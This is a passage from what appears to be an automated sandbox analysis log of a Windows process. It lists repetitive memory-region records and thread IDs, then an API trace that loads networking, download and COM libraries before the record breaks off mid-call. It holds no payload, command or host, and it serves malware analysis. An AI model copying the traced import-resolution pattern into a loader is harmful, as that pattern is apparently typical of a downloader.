pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22732 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22733 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22735 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22736 start_va = 0x3ec0000 end_va = 0x3edbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 22737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22797 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22798 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22799 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22800 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22801 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22802 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22803 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22804 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22805 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22806 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22807 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22808 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22809 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22810 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22811 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22812 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22813 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22815 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22816 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22834 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22835 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22836 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22837 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22838 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22839 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22840 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22841 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22842 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22843 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22844 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22845 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22846 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22847 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22848 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22849 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22850 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22851 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Thread: id = 5 os_tid = 0x10d8 Thread: id = 6 os_tid = 0x10d0 Thread: id = 7 os_tid = 0x10cc Thread: id = 8 os_tid = 0x1074 Thread: id = 9 os_tid = 0xe18 Thread: id = 10 os_tid = 0xe10 Thread: id = 11 os_tid = 0x5b4 Thread: id = 12 os_tid = 0x914 Thread: id = 13 os_tid = 0x778 Thread: id = 14 os_tid = 0x504 Thread: id = 15 os_tid = 0x300 Thread: id = 16 os_tid = 0xa50 Thread: id = 17 os_tid = 0x4bc Thread: id = 18 os_tid = 0xb70 Thread: id = 19 os_tid = 0xa64 Thread: id = 20 os_tid = 0xa50 Thread: id = 21 os_tid = 0xa4c Thread: id = 22 os_tid = 0xa48 Thread: id = 23 os_tid = 0xa44 Thread: id = 24 os_tid = 0xa40 Thread: id = 25 os_tid = 0xa24 Thread: id = 26 os_tid = 0xa20 Thread: id = 27 os_tid = 0x9e4 Thread: id = 28 os_tid = 0x880 Thread: id = 29 os_tid = 0x874 Thread: id = 30 os_tid = 0x84c Thread: id = 31 os_tid = 0x844 Thread: id = 32 os_tid = 0x83c Thread: id = 33 os_tid = 0x818 Thread: id = 34 os_tid = 0x814 Thread: id = 35 os_tid = 0x80c Thread: id = 36 os_tid = 0x804 Thread: id = 37 os_tid = 0x498 Thread: id = 38 os_tid = 0x694 Thread: id = 39 os_tid = 0x43c Thread: id = 40 os_tid = 0x490 Thread: id = 41 os_tid = 0x4b0 Thread: id = 42 os_tid = 0x494 Thread: id = 43 os_tid = 0x724 Thread: id = 44 os_tid = 0x5e8 Thread: id = 45 os_tid = 0x6c4 Thread: id = 46 os_tid = 0x6b8 Thread: id = 47 os_tid = 0x7b8 Thread: id = 48 os_tid = 0x13b4 [0104.685] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffa16770000 [0104.686] GetProcAddress (hModule=0x7ffa16770000, lpProcName="RtlExitUserThread") returned 0x7ffa167cc2a0 [0104.688] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x4a30000 [0105.529] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10) returned 0x4a30830 [0105.529] LoadLibraryA (lpLibFileName="user32") returned 0x7ffa13d80000 [0105.530] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x10 [0105.536] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.536] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a30830 [0105.536] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffa15090000 [0105.537] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x12 [0105.537] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.537] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10) returned 0x4a30830 [0105.537] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffa09580000 [0105.538] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x10 [0105.538] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.538] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0xf) returned 0x4a30830 [0105.538] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffa13b70000 [0105.538] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0xf [0105.538] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.538] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x11) returned 0x4a30830 [0105.539] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffa0ed60000 [0105.539] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x11 [0105.539] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.539] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10) returned 0x4a30830 [0105.539] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffa146e0000 [0105.540] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x10 [0105.540] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.540] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10) returned 0x4a30830 [0105.540] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffa11800000 [0105.553] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x10 [0105.554] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.554] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x11) returned 0x4a30830 [0105.554] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffa15210000 [0105.554] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x11 [0105.554] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0105.555] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0105.555] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeEx") returned 0x7ffa143a2c50 [0105.555] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0105.556] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeSecurity") returned 0x7ffa14375fe0 [0105.556] LoadLibraryA 